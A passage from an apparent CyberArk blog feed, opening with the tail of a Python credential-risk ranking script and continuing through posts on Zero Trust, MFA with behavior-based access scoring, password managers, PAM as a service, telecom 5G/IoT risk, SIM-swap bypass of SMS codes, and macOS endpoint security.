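TODAY = date(2019, 11, 5)               # fixed "now" so the ranking is reproducible


@dataclass
class PrivilegedCredential:
    name: str
    kind: str                 # domain_admin | infra_default | ssh_key | local_admin | app_secret | saas_admin
    asset_tier: int           # 0 = domain controllers / cloud consoles, 1 = broad-reach admin, 2 = other
    vaulted: bool = False     # stored and rotated in a digital vault
    mfa_required: bool = False
    hardcoded: bool = False   # embedded in code, config or a COTS app
    default_password: bool = False
    root_access: bool = False
    last_rotated: Optional[date] = None
    regulated_data: bool = False
    known_vulnerable: bool = False   # flagged by an audit, pentest or red team exercise


def risk_score(cred: PrivilegedCredential, today: date) -> int:
    """Higher score = fix sooner. Comments name the step each rule comes from."""
    score = {0: 40, 1: 25}.get(cred.asset_tier, 5)            # step 3: tier 0/1 assets first
    if not cred.vaulted:
        score += 20                                            # steps 3, 4, 6: vault everything privileged
    if cred.default_password:
        score += 25                                            # step 4: default, unchanged infra passwords
    if cred.kind == "ssh_key" and cred.root_access and not cred.vaulted:
        score += 20                                            # step 7: unmanaged root SSH keys
    if cred.hardcoded:
        score += 20                                            # steps 6, 8: hard-coded app / DevOps secrets
    if cred.kind == "local_admin":
        score += 10                                            # step 5: lateral movement via workstations
    if cred.kind in ("domain_admin", "saas_admin") and not cred.mfa_required:
        score += 15                                            # steps 3, 9: MFA on admin and SaaS access
    if cred.last_rotated is None or today - cred.last_rotated > ROTATION_MAX_AGE:
        score += 10                                            # step 8: stale or never-rotated secrets
    if cred.regulated_data:
        score += 10                                            # step 2: regulatory exposure
    if cred.known_vulnerable:
        score += 15                                            # step 2: already-identified weaknesses
    return score


def prioritize(inventory, today):
    """Return (score, credential) pairs, riskiest first; ties keep inventory order."""
    return sorted(((risk_score(c, today), c) for c in inventory),
                  key=lambda pair: pair[0], reverse=True)


def sprint_plan(inventory, today, sprint_size=2):
    """Split the ranked inventory into fixed-size sprints (the phased rollout of step 2)."""
    ranked = [c.name for _, c in prioritize(inventory, today)]
    return [ranked[i:i + sprint_size] for i in range(0, len(ranked), sprint_size)]


# Constructed sample inventory, as a discovery scan (step 1) might report it.
SAMPLE_INVENTORY = [
    PrivilegedCredential("CORP\\Administrator", "domain_admin", 0,
                         last_rotated=date(2019, 1, 15), regulated_data=True),
    PrivilegedCredential("esxi-root-default", "infra_default", 1,
                         default_password=True, root_access=True),
    PrivilegedCredential("jenkins-deploy-key", "ssh_key", 1,
                         root_access=True, last_rotated=date(2019, 9, 1)),
    PrivilegedCredential("crm-db-connection-string", "app_secret", 2,
                         hardcoded=True, regulated_data=True),
    PrivilegedCredential("WS-1042 local admin", "local_admin", 2),
    PrivilegedCredential("salesforce-admin", "saas_admin", 2,
                         vaulted=True, mfa_required=True, last_rotated=date(2019, 10, 1)),
]

if __name__ == "__main__":
    for score, cred in prioritize(SAMPLE_INVENTORY, TODAY):
        print(f"{score:3d}  {cred.name}")
    print(sprint_plan(SAMPLE_INVENTORY, TODAY))
```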

While there is no one-size-fits-all approach to security, implementing these steps can help your organization achieve greater risk reduction in less time and satisfy security and regulatory objectives with fewer internal resources.

To learn more, read our eBook, Privileged Access Security for Dummies.

]]>
Passwords Need Fixing. Adaptive MFA Everywhere is the Solution. https://www.cyberark.com/blog/passwords-need-fixing-adaptive-mfa-everywhere-is-the-solution/ Mon, 04 Nov 2019 20:49:51 +0000 https://www.cyberark.com/?p=98927

Ask an average person to identify the most common cause of data breaches and they are more likely than not to echo the terrifying headlines they’ve read about: sophisticated state-sponsored attacks, stolen NSA tools, or zero-day flaws in popular operating systems. Yet, the truth is that stolen, weak, or default passwords are actually to blame most of the time.

In fact, research clearly shows too many apps are secured by passwords alone. While improvements have been made to how we use and secure passwords today (I’ll touch on those below), the fact remains that average business users now manage upwards of 200 passwords. For businesses, it’s a delicate balance: one-step authentication makes it simple for unwanted guests to slip through, gain access and infiltrate systems. But introduce too many onerous security steps, and users rebel and find workarounds — or worse, avoid work altogether. That’s how corners get cut. So, what’s the answer?

If you read our blogs, you already know the answer: a Zero Trust strategy enabled by Next-Gen Access technology. Next-Gen Access can’t remove all security steps on the user’s log-in path, but it can choose when (and how much) friction needs to be applied to either let that user pass through easily or take further action to confirm their identity.

Previously, I wrote that the core principle guiding Zero Trust is to “never trust, always verify” and that starts with users. But how do organizations take those critical first steps toward improving security posture? Let’s break down how to verify every user in the Zero Trust approach.

Apply MFA here, there, and everywhere

It’s no secret that multi-factor authentication (MFA) is the single best line of defense against unwanted guests wielding compromised credentials. Yet, it’s not widely deployed. Why not? Well, the short version is that it has traditionally been complex to use and hard to integrate – making it a burden to end users and IT.

At its core, MFA requires at least two of three different factors to verify user authenticity: something you know, something you have, and something you are. An example of “something you know” is a PIN code or secret question. “Something you have” is a prompt to another device in the user’s possession, such as a key fob that generates a one-time code, or a USB key, smart card, or smartphone. Last but not least, “something you are” is a bit more sci-fi and includes biometrics like an iris scan or thumbprint.

The big issue holding back the adoption of MFA is that these capabilities are not applied consistently across the apps and services we use. For example, many of us have multiple financial accounts for banking, credit and investments. We enable MFA for each, but they all use different approaches and we have to know how to do each one, otherwise we’re locked out. That’s a pain.

So we enable it in a few places because we’re afraid of being breached, not because it’s an ideal user experience, and that limits more extensive use. However, the cybersecurity industry, including companies like Idaptive, has spent hundreds of millions of dollars to improve MFA for a better out-of-the-box experience for business. By providing a consistent, approachable, and secure login experience across all apps and devices, businesses can enforce MFA everywhere in their organization without placing a burden on IT or exposing a less than optimal experience to end users.

Still, extra steps from MFA, no matter how smooth the user experience, can lead to adoption issues through added friction that frustrates users. For a truly Next-Gen Access approach, MFA needs to be combined with other features to improve users’ productivity rather than hinder it.

Shine the spotlight on single sign-on

This is where single sign-on (SSO) comes into play. SSO saves users hundreds of hours managing logins and saves businesses millions of dollars when it comes to productivity. Alone, as SSO has traditionally been sold to enterprises, it is a double-edged sword that greatly reduces an organization’s attack surface — but also may increase the impact of a breach because of the centralized access it offers to users. SSO, when combined with MFA, becomes much safer and incredibly powerful.

Only needing to sign in once eliminates the need to enter passwords repeatedly and send them across networks. At the same time, when integrated with another security step through MFA, businesses need not worry that a single password unlocks the keys to the kingdom. With multi-step verification, additional layers of security reduce the attack surface by an order of magnitude.

It’s not perfect though. There’s one final ingredient — the cherry on top of the cybersecurity pie — that Next-Gen Access technology provides to Zero Trust adopters.

Leave it to Behavior (-based access)

Together MFA and SSO allow for a much higher degree of confidence for security, but we still can’t trust that every user is who they say they are without the right context. Access decisions are simple when it comes to recognized devices and networks, but what happens when someone attempts a login from a new laptop or remote location? And for enhanced protection, you may choose to prompt users more often than necessary for MFA because you want to err on the side of security rather than convenience.

In a Next-Gen Access approach to Zero Trust, context is what determines whether to add friction to that user’s path. When an employee uses their recognized device, during their normal routine or hours, from their usual locations, accessing systems and apps they always use — then we don’t add friction. However, if someone is not doing those things, then we restrict or block that access until the user can verify that they are, in fact, who they say they are.

In the past, rules like this had to be written for each individual by IT teams, often a herculean, if not impossible, effort. Take for example the accountant who works every day from headquarters, on the corporate network, using the same laptop, and uses the same three applications from 9 to 5. We could write a rule that any user who is on the corporate network, using a known device, accessing a familiar app, during office hours should be allowed silent sign-on without extra steps. But what about the salesperson traveling up and down the coast, never on the corporate network, using their own device from a Starbucks to access Salesforce.com? That would obviously require some more rules. Taken to the extreme, you would need rules for every individual user, something IT is loath to do; often it gives up and just adds friction for everyone.

Today, however, Idaptive does the heavy lifting, using machine learning to understand and assess user behavior, develop a unique behavior model for each user, and then make intelligent access decisions in real time based on risk. Your IT organization only has to determine what is required at each risk level when a user is not acting according to their own behavior profile. This is the benefit of behavior-based access technology: the ability to automate access decisions and greatly reduce the attack surface, eliminate the IT burden of managing myriad rules, and at the same time not destroy the spirit of the user.
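To show how a per-user behavior model replaces hand-written rules, here is an added example (not Idaptive's product or code): it learns each user's profile from their own verified logins and maps the anomaly score of a new request to the friction described above (silent sign-on, MFA challenge, or block until verified); the login history, weights and thresholds are constructed.

```python
"""Context-aware access decisions from a learned per-user profile (added illustration).

Not Idaptive's model or code. Each user's profile counts the devices, networks,
locations, apps and login hours seen in that user's own verified logins; a new
request is scored by how unfamiliar each attribute is, and the score chooses
the friction. History, weights and thresholds are constructed for illustration.
"""
from collections import Counter
from dataclasses import dataclass, field
from datetime import datetime


@dataclass
class LoginEvent:
    user: str
    device: str
    network: str
    location: str
    app: str
    when: datetime


# Assumed weights: an unknown device is the strongest signal, an unusual app or hour the weakest.
WEIGHTS = {"device": 3.0, "location": 2.0, "network": 1.5, "app": 1.0, "hour": 1.0}
FAMILIAR_AFTER = 2      # seen this many times => fully routine
MFA_THRESHOLD = 1.5     # score at or above this => step-up authentication
BLOCK_THRESHOLD = 5.0   # score at or above this => block until the user verifies out of band
MIN_HISTORY = 5         # fewer verified logins than this => model untrained, always challenge


@dataclass
class BehaviorProfile:
    """Counts of what one user has done in past verified logins."""
    seen: dict = field(default_factory=lambda: {k: Counter() for k in WEIGHTS})
    events: int = 0

    @staticmethod
    def attributes(ev: LoginEvent) -> dict:
        return {"device": ev.device, "network": ev.network, "location": ev.location,
                "app": ev.app, "hour": ev.when.hour}

    def observe(self, ev: LoginEvent) -> None:
        """Fold a verified login into the model (after silent sign-on or a passed MFA challenge)."""
        for key, value in self.attributes(ev).items():
            self.seen[key][value] += 1
        self.events += 1

    def familiarity(self, key: str, value) -> float:
        """0.0 = never seen, 1.0 = seen at least FAMILIAR_AFTER times."""
        return min(1.0, self.seen[key][value] / FAMILIAR_AFTER)


def anomaly_score(profile: BehaviorProfile, ev: LoginEvent) -> float:
    """Weighted sum of how unfamiliar each context attribute is; 0.0 means fully routine."""
    return sum(WEIGHTS[key] * (1.0 - profile.familiarity(key, value))
               for key, value in profile.attributes(ev).items())


def decide(profile: BehaviorProfile, ev: LoginEvent) -> str:
    """Map the anomaly score to friction: 'allow', 'mfa' or 'block'."""
    if profile.events < MIN_HISTORY:
        return "mfa"
    score = anomaly_score(profile, ev)
    if score >= BLOCK_THRESHOLD:
        return "block"
    if score >= MFA_THRESHOLD:
        return "mfa"
    return "allow"


def build_profiles(history):
    """One profile per user, learned only from that user's own verified logins."""
    profiles = {}
    for ev in history:
        profiles.setdefault(ev.user, BehaviorProfile()).observe(ev)
    return profiles


def evaluate(profiles, ev: LoginEvent) -> str:
    """Decision for a request; a user with no history gets an empty (untrained) profile."""
    return decide(profiles.get(ev.user, BehaviorProfile()), ev)


# Constructed history: "ana" is the accountant (one laptop, HQ network, office hours, three
# apps); "sam" is the traveling salesperson (own phone, public Wi-Fi, several cities).
HISTORY = [
    LoginEvent("ana", "ana-laptop", "corp-hq", "Boston",
               ("ledger", "payroll", "email")[i % 3], datetime(2019, 10, 1 + i, 9 + i % 5))
    for i in range(10)
] + [
    LoginEvent("sam", "sam-phone", "public-wifi", ("Seattle", "Portland", "Eugene")[i % 3],
               "salesforce", datetime(2019, 10, 1 + i, 8 + i % 5))
    for i in range(10)
]

# Constructed requests to evaluate against the learned profiles.
REQUESTS = {
    "ana_routine": LoginEvent("ana", "ana-laptop", "corp-hq", "Boston", "ledger", datetime(2019, 11, 4, 10)),
    "ana_new_device": LoginEvent("ana", "unknown-tablet", "home-isp", "Boston", "ledger", datetime(2019, 11, 4, 10)),
    "ana_far_off": LoginEvent("ana", "unknown-tablet", "home-isp", "Paris", "payroll", datetime(2019, 11, 4, 3)),
    "sam_on_the_road": LoginEvent("sam", "sam-phone", "public-wifi", "Portland", "salesforce", datetime(2019, 11, 4, 10)),
    "sam_new_city": LoginEvent("sam", "sam-phone", "public-wifi", "Bend", "salesforce", datetime(2019, 11, 4, 10)),
    "no_history": LoginEvent("new-hire", "x-laptop", "corp-hq", "Boston", "email", datetime(2019, 11, 4, 10)),
}

if __name__ == "__main__":
    profiles = build_profiles(HISTORY)
    for name, req in REQUESTS.items():
        print(f"{name:16s} score={anomaly_score(profiles.get(req.user, BehaviorProfile()), req):.1f} "
              f"-> {evaluate(profiles, req)}")
```

The same public Wi-Fi login that is routine for sam would challenge ana, because each decision is made against that user's own history rather than a shared rule.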

Security improvements should always be balanced against the end user experience, whether that’s a customer, partner, or employee. There must be a consistent way for these people to discover and access their apps, alongside an intelligent approach to limit or increase friction based on risk level.

Passwords are just one piece of the cybersecurity puzzle. Any device that has access to your systems needs to have trust established just as the user does. In my next blog post, I’ll dive into the ways organizations can “validate every device” as part of their Zero Trust strategy.

Read the Zero Trust series here:

  • Zero Trust Series – 1 What Is Zero Trust and Why Is it So Important?
  • Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead
  • Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”
  • Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle
  • Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance
  • Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.
  • Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust
  • Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security
  • Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.
  • Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.
  • Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.
  • Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
Are Password Managers Good Enough to Protect You? https://www.cyberark.com/blog/are-password-managers-good-enough-to-protect-you/ Thu, 31 Oct 2019 17:11:14 +0000 https://www.cyberark.com/?p=76589 Password Manager

October is National Cybersecurity Awareness Month and, over the past few weeks, we’ve written blogs highlighting this year’s themes: Own it. Secure it. Protect it. We wrote about the opportunity and risk of emerging technologies like 5G and IoT and the rise of biometrics as a way to increase account security.

For Protect It we’re diving into the world of password management. Whether it’s for work or personal use, chances are you have a ton of different passwords – and some that may even give you access to sensitive accounts and critical systems.

There’s an even bigger chance that those passwords are relatively simple and easily guessed by an attacker. And you might be using the same password over and over. In that case, if an attacker cracks your password for one system, they can compromise every other system where you use that password.

Or maybe you use multiple, hard-to-guess passwords – but to save time and brainpower you save the credentials in your browser’s built-in password manager. Most popular browsers like Chrome, Safari, Firefox, Internet Explorer and Opera offer built-in password managers that store and auto-fill website passwords when you need them. The simplicity makes this a compelling option. But is it the best way to protect the data you care about most?

Despite the convenience, there is a major downside to saving credentials in a browser. Because so many people use integrated password managers, they are a natural target for credential theft attacks. Cyber attackers count on us choosing convenience over security and credentials saved in a browser are a super easy target. Credential theft attacks can be fully executed from a single user’s workstation by leveraging passwords for social media accounts and other credentials stored on the device.

So, what should you be using to better protect your online passwords and secure your digital life?

Dedicated Password Managers: The Good and the Bad

Dedicated password managers allow you to save, generate and update all of your passwords in one encrypted location protected by a single, strong password or passphrase. These tools are increasingly popular among consumers and enterprises alike, but as with most tools and technologies, they don’t completely eliminate security risks. Here are a few best practices to help you safeguard your dedicated password manager:

  1. Be on the lookout for phishing attempts. According to the Verizon DBIR 2019, phishing was involved in 32 percent of confirmed breaches as well as 78 percent of cyber-espionage incidents. It’s important to stay vigilant and never click on links or open attachments from people you do not know or ones that seem out of character.
  2. Always use multi-factor authentication (MFA). Ensure that multiple types of authentication methods – not just a password – are required to unlock the account. This is important not only for your dedicated password manager, but for other online services like your bank account, email and social media accounts.
  3. Choose a strong master password. Your master password is the key to unlocking every single online password stored in the repository. The US National Institute of Standards and Technology (NIST) recently updated its recommended standards on password security – hopefully removing some of the headaches for users while working to improve security. Noteworthy elements of the guidelines include recommendations for users to select longer, memorable passphrases without complex construction rules. NIST now recommends password resets only in cases where there is a suspected threat, rather than on a fixed schedule.
  4. Use different passwords for every online account. Don’t reuse passwords on multiple sites or accounts – even if it’s a strong password. If you do, and one account is hacked, the others can easily be compromised as well. Every time you create a new password for an online service, be sure to make it unique. Password managers can also act as password generators and create a unique password for you.

Dedicated password managers are a viable option for individual users and can help strengthen the security of their machines and digital information. But, when it comes to securing a business – it’s best to look for solutions purpose-built for enterprise requirements.

Password managers only manage the passwords of a single person – which is great when the only one you’re securing is you. But businesses are made up of many people and, often, those people have different needs when it comes to system access. A password manager can’t manage who gets access to what.

However, an enterprise-level solution can ensure that no person has access to more than they need – preventing cyber attackers from using a compromised account to go straight for the most vital information. The extra ingredient that this type of enterprise-level solution provides is privileged access management (PAM) – a cybersecurity strategy for controlling, monitoring, securing and auditing everyone and everything in an IT environment.

Password managers are a big step up from trying to memorize all of your passwords yourself – or letting your browser (or a post-it note) remember them for you. They can save you time, increase your security and free up a lot of mental clutter. But, if you’re trying to handle access on the scale of a business, you need privileged access management.

]]>
Privileged Access Management as a Service: Why It Matters https://www.cyberark.com/blog/privilege-access-management-as-a-service-why-it-matters/ Tue, 29 Oct 2019 13:00:08 +0000 https://www.cyberark.com/?p=76410 Privileged Access Management (PAM) as a Service

Privileged access is the gateway to an organization’s most valuable assets. Nearly all advanced cyber-attacks exploit privileged accounts. Leading analysts and security professionals agree: Privileged Access Management (PAM) is a critical initiative.

However, many organizations still don’t have a plan in place to secure privileged accounts, credentials and secrets. This gap is often because organizations do not have, or do not think they have, the resources to manage a PAM solution effectively and efficiently.

Security teams are finding themselves in a similar predicament to businesses shifting their data centers and computing to the cloud. Both security teams and businesses alike want to reduce cost, improve computing strength and address the lack of internal resources that makes managing on-premises infrastructure difficult. For example, recently, there has been a dramatic shift toward commercial off-the-shelf software (COTS) being deployed as Software as a Service (SaaS).

One of the major challenges facing organizations is a shortage of trained security and IT staff. It’s hard enough for organizations to stave off the rising number of attacks. Harder still is maintaining a strong cybersecurity posture without enough of the right people on your team. This forces organizations to make tough decisions on what tools they can utilize and manage.

This probably explains why security solutions deployed as a service are surging in popularity. They provide customers with risk mitigation solutions that don’t require managing additional infrastructure and offload much of the hands-on management that on-premises solutions require. SaaS models allow organizations to hand off the majority of the work of managing infrastructure and handling upgrades, and free up IT security staff to concentrate on risk and compliance. PAM is no different from other SaaS or security solutions being deployed as a service.

PAM as a Service is a critical initiative for organizations that simply don’t feel they have the resources to deploy and maintain an on-premises PAM solution, or that would rather allocate precious internal resources elsewhere.

By implementing PAM as a Service, organizations can have all the benefits of a strong PAM implementation without burdening their IT teams with managing additional infrastructure or doing upgrades. These organizations also gain the additional benefits of SaaS. This includes moving to an OpEx model vs. CapEx model for their PAM software expenditures.

CyberArk Privilege Cloud helps to meet organizational needs for the fundamental capabilities of securing privileged access without requiring additional infrastructure management. CyberArk’s PAM as a Service offering provides organizations with the ability to discover, onboard and manage privileged accounts and credentials in on-premises, cloud and hybrid environments all from an easy to deploy and manage cloud computing solution.

Privilege Cloud is also able to isolate credentials and prevent them from reaching end user workstations. It records and monitors sessions to protect sensitive information and systems, helping organizations meet audit and compliance requirements.

CyberArk Cloud-Based Enterprise Privileged Access Security

Privilege Cloud dramatically cuts the amount of time needed to deploy. This allows any organization to quickly move PAM from their “wish list” to their “done list.”

Leaning on its expertise as a trusted adviser to organizations of all sizes, CyberArk has created the CyberArk Privilege Cloud Guided Success Plan to help organizations not only quickly reduce risk, but also stay secure when deploying PAM as a Service. The Guided Success Plan is tailored to meet the most critical needs of each organization. It follows a three-phase approach that can be scaled and repeatedly applied.

PAM as a Service is a great way for organizations to quickly secure their critical resources and systems without the need to manage additional infrastructure. Learn more about why your organization should prioritize Privileged Access Management as a Service today!

]]>
With 5G and IoT, It’s a New Day with New Risks https://www.cyberark.com/blog/with-5g-and-iot-its-a-new-day-with-new-risks/ Thu, 24 Oct 2019 13:00:17 +0000 https://www.cyberark.com/?p=76133 5G and Internet of Things (IoT)

Connected devices and smart technology — often referred to collectively as the Internet of Things (IoT) — are present in every aspect of our lives today: at home, school, work and on the go. Constant connection provides opportunities for innovation and modernization. But, it also opens up potential cybersecurity threats that can compromise your most important personal information.

October is National Cybersecurity Awareness Month (NCSAM), and this year’s theme is “Own It. Secure It. Protect It.” Today we’ll take a look at “Own It.”  This sub-theme focuses in on topics like IoT, social media and online privacy.

For this particular blog, we’ll examine cybersecurity in the telecommunications sector. We’ll highlight the challenges this industry faces in keeping your devices and information safe and secure.

CSPs and the Opportunity for Disruption

For communications services providers (CSPs) specializing in mobile services, media or web services, the only constant is relentless innovation. Staying competitive and relevant requires CSPs to deliver business value beyond basic connectivity. While these factors undermine established business models, they also open up lucrative new markets and opportunities for incumbent players. Consider a couple of trends and market forces surrounding CSPs today:

  • The Internet of Everything. Smart cities and infrastructure, connected vehicles, digital healthcare, smart homes and more are transforming markets.
  • Transformational mobile bandwidth is coming online at the same time that the IoT is reaching critical mass. The impending disruption will be massive.
  • Over the Top (OTT). OTT entities are content providers that distribute messaging and streaming media over the internet. Years after Yahoo! Messenger and AOL’s AIM came and went, OTT players keep finding new ways to undermine CSP business models. Just look at Tencent, parent company of WeChat, which currently has a market cap of $397B (compared to Verizon’s $250B). Or consider the meteoric rise of OTT streaming players like Netflix and Hulu.
  • Cyber Attacks. Telecom companies are frequently targeted by cyber attacks because they build, control and operate critical infrastructure that is widely used to communicate and store large amounts of sensitive data for consumers, businesses and government. Data breaches or denial of service attacks on CSPs can reverberate far beyond the initial incident. Moreover, end user equipment—home routers, smartphones, IoT devices and more—is only nominally under CSP control. This makes it easy to compromise and an ideal target for hackers looking to steal data.
  • Privacy is Paramount. In a stiffening regulatory environment, data privacy is a higher priority than ever before. Since prominent communications brands have been implicated in major data breaches, CSPs recognize the need to embrace trust as a competitive differentiator.

For consumers, the dramatic expansion in bandwidth and connectivity that will come with 5G technologies and emerging IoT models will likely mean more options for engaging with media.  It will also present new opportunities for both media providers and network operators. There’s no doubt that it’s an exciting time in the telecommunications sector.

CSPs are positioned to enable these new business models. Of course, like with any great innovation, CSPs can’t just sit back reveling in the uptick in revenue. They still need to be mindful of the risks inherent in the data economy and work to secure their customers from them.

Operational and Security Challenges in Telecommunications

The many, varied and expanding vulnerabilities in telecommunications infrastructure present a number of risk factors that are potentially far more harmful than the typical privacy breach at a retailer, bank or other consumer-oriented organization. Bad publicity, brand damage and regulatory fines can be very costly. However, a cyber attack on a telecom company has follow-on impacts that most others don’t.

Think about it. Telecommunications systems serve as a critical backbone to nations and economies across the globe, which makes network security critical. In addition, network operators typically maintain extraordinarily diverse legacy equipment infrastructure. They use servers, switches, access points and network interfaces from a variety of different manufacturers.

Every day, these systems enable the transmission of financial and business transactions as well as emergency response communications. If compromised, the consequences can be dire.

Privileged Access Management: The Key to Protecting Critical Infrastructure

Privileged credentials exist everywhere. Attackers know this. That is why almost all advanced attacks today rely on the exploitation of privileged credentials to reach a target’s most sensitive data, applications and infrastructure. Telecommunications is no exception.

Yet, too often, privileged access to critical systems is left unsecured and unmanaged. This puts assets at an increased risk of a damaging cyber attack that could impact telecommunications companies and citizens alike.

Privileged accounts and credentials provide superuser access to critical telecommunications infrastructure on-premises, in the cloud and in hybrid environments. To reduce the risk of costly, disruptive damage to these systems, it’s vital that companies proactively secure, control and monitor the use of powerful privileged accounts. Remote desktop protocol (RDP) and Virtual Network Computing (VNC) credentials, in particular, provide cybercriminals with a way to both gain initial entry into networks and move laterally. This is an essential process for identifying the systems where malicious software will be most effective.

So, how can telecom companies proactively reduce the risk of privileged access abuse?

  • Understand the most common types of attacks that exploit privileged access. How does an attacker think and behave in each case to exploit the organization’s vulnerabilities?
  • Prioritize the most important privileged accounts, credentials and secrets. Identify the potential weaknesses and vulnerabilities in the existing privileged access management (PAM) program. Focus especially on those that could jeopardize critical infrastructure or the organization’s most vital information.
  • Determine the most effective actions to close the gap on these weaknesses and potential vulnerabilities. Which actions are the highest priority? What can be achieved quickly and which require a longer-term plan?
  • Continually improve by taking the time to plan out a strategy for managing privileged access. Return to reassess the strategy as your organization and the threat landscape evolve.

To learn how to create an action plan for securing privileged accounts, credentials and secrets in telecommunications environments, download our eBook, Secure Telecommunications in the Age of 5G and the IoT. And watch this space, where we’ll soon cover our final NCSAM topic, “Protect It.”

Open and Open Source: A New Community for All https://www.cyberark.com/blog/open-and-open-source-a-new-community-for-all/ Mon, 21 Oct 2019 13:00:16 +0000 https://www.cyberark.com/?p=75986 Open source Community, Open Source Project

Open source has fundamentally changed software development. It’s taken the burden off individual businesses struggling to build or buy everything they need. It’s shifting responsibility for the development process to a broader, interconnected ecosystem of individuals and businesses that can collaboratively tackle mutually beneficial projects. The spirit and passion of the open source community inspired us to create a forum to encourage open access and improved collaboration across our business.

With that in mind, today we are thrilled to unveil CyberArk Commons—a new open community for developers, engineers and security professionals to discuss open source projects, DevOps, and the latest cybersecurity research from the CyberArk Labs team. We already make CyberArk Labs and product documentation easily accessible and available to all.  Now we take it to the next level with CyberArk Commons to encourage dialogue and active engagement.

We invite all of our readers to visit CyberArk Commons—there’s something there for everyone:

  • Connect. Come and engage with likeminded peers and subject matter experts. Learn about a variety of topics from the CyberArk Conjur secrets management solution and other DevOps security tools to the fast-growing CyberArk Marketplace, which features a wealth of community contributions.
  • Contribute. Share content, code and ideas on the CyberArk Commons discussion forum to help the collective community address evolving security challenges.
  • Learn. Explore technical content and insights on top-of-mind open source topics written by the engineers and practitioners like you who know them best.
  • Build. Experience the latest open source tools and approaches from the CyberArk Commons community. Share ideas, give feedback and help make great solutions even better!
  • Anticipate. Arm yourself with the latest technical research and open source cybersecurity tools from CyberArk Labs and Red Team security experts to help you think like an attacker and proactively stay ahead of the latest threats.

CyberArk Commons is open to all, whether you’re a current customer, partner, member of the technical community or are just starting to get interested in privileged access management. Connect and engage with peers and subject matter experts on CyberArk products and services. Explore DevOps and open source and discuss new research with the members of the CyberArk Labs team.

Visit CyberArk Commons today to start contributing to important industry dialogue and solving cybersecurity challenges faster and smarter together!

To learn more about open source and CyberArk Commons, visit the CyberArk Conjur blog.

MFA and Biometric Authentication: Secure the Digital Profile https://www.cyberark.com/blog/mfa-and-biometric-authentication-secure-the-digital-profile/ Thu, 17 Oct 2019 13:00:55 +0000 https://www.cyberark.com/?p=75909

Every October, National Cybersecurity Awareness Month (NCSAM) promotes the importance of cybersecurity and helps make resources available so that people can be safer and more secure online.

This year’s NCSAM theme is “Own It. Secure It. Protect It.” The theme emphasizes the role each individual person plays in online safety and the importance of taking proactive steps to enhance cybersecurity both at home and in the workplace.

Over the next few weeks, we’ll explore each of these three core components — beginning with “Secure It.”

When It Comes to Securing Your Digital Profile, MFA Is Table Stakes

Cybercriminals are very good at getting personal and sensitive information from unsuspecting victims. As technology evolves, their methods have become increasingly targeted.

Technology users have a responsibility to protect against cyber threats by learning about the security features available on the devices and in the software that they use. It’s also critical to use multiple types of authentication — not just a password — to protect devices and online services such as bank accounts, email and social media accounts.

Typically, this begins with implementing multi-factor authentication (MFA), a security mechanism in which individuals must present two pieces of identity verification when logging into an account. In most cases, MFA includes a password and some kind of authentication on the user’s mobile device — SMS is the most common. Using MFA means that even if a cyber attacker manages to figure out your super strong password, they still would not be able to gain access without the other piece of authentication.

According to Microsoft research, utilizing MFA makes your accounts 99.9 percent less likely to be compromised. It’s an important cybersecurity best practice that doesn’t take much effort to implement. Unfortunately, however, motivated cyber attackers are always discovering potential work-arounds. Recent headlines reveal that while MFA is a critical step, it is also a target.

Overcoming Blind Spots in MFA with Biometric Technology

Earlier this month, the FBI issued a warning stating that it has “observed cyber actors circumventing multi-factor authentication through common social engineering and technical attacks.”

As more people implement MFA as an additional layer of cybersecurity protection, attackers are turning their attention and efforts toward exploiting blind spots inherent in MFA. Consider that MFA typically relies on “something you know” (e.g., a security question) and “something you have” (e.g., a laptop or smartphone). Here’s the problem — nothing about either of these methods actually confirms identity. Something you have can be stolen and something you know can be learned.

The attack on Twitter CEO Jack Dorsey is an example of how attackers can exploit these MFA blind spots. In late August, Dorsey’s personal Twitter handle was compromised. Nearly two-dozen offensive tweets and re-tweets were posted before the content was removed. The social media attack was just one in a series of Twitter account takeovers targeting a string of celebrities and social media influencers.

The attack method, known as a “SIM swap,” is accomplished when an attacker either convinces or bribes a mobile carrier employee to switch the number associated with a SIM card to another mobile device. According to the New York Times, these switches often cost as little as $100 for each phone number.

After the switch is made, the attacker can intercept any MFA codes sent by text message and essentially take control of the user’s entire phone number. This allows the attacker to gain access to everything from a person’s social media to banking, email and even cryptocurrency accounts. Some attackers are even using this SIM swap method to target and compromise high-profile politicians, causing reputation damage and spreading misinformation.

So how can you protect yourself? The FBI is urging individuals and organizations to continue using MFA and also to take security one step further by adding biometric authentication. This will make it harder for attackers to trick users into disclosing MFA codes or to obtain them through technical interception.

Biometric authentication uses biometric identifiers such as fingerprints, iris scans and voice patterns for identification and access control purposes. These biometric identifiers are completely unique to the individual. As an individual, you can easily activate biometric functionality already available on your devices and use it for authentication purposes.

There is no silver bullet for cybersecurity — it takes a strong mix of technology and security best practices to protect yourself and your organization in the digital era. The FBI’s guidelines around MFA and common-sense biometrics applications are spot on — as both are integral components of a multi-layered security approach. (This is sometimes referred to as Zero Trust for enterprise organizations).

Don’t wait until it’s too late. Take action this Cybersecurity Awareness Month and “Secure It” by applying these important layers of security to your devices and online accounts.

How to Implement Successful Endpoint Security for macOS https://www.cyberark.com/blog/how-to-implement-successful-endpoint-security-for-macos/ Wed, 16 Oct 2019 21:08:50 +0000 https://www.cyberark.com/?p=75891

The belief that there are no viruses or other types of malware for macOS dates back to the release of Mac OS X at the very beginning of this millennium. Unfortunately, this is a myth.

The number of Mac users infected by malware and other Mac threats has grown exponentially since 2010. We see large numbers of people infected with Mac threats every day on a much larger scale than even just a few years ago. Macs are a growing presence in enterprises and it’s the perfect time to stop treating them as exceptions to desktop and laptop security policies. Security and risk management decision-makers need to understand the potential security risks for Macs and to follow best practices to secure macOS endpoints.

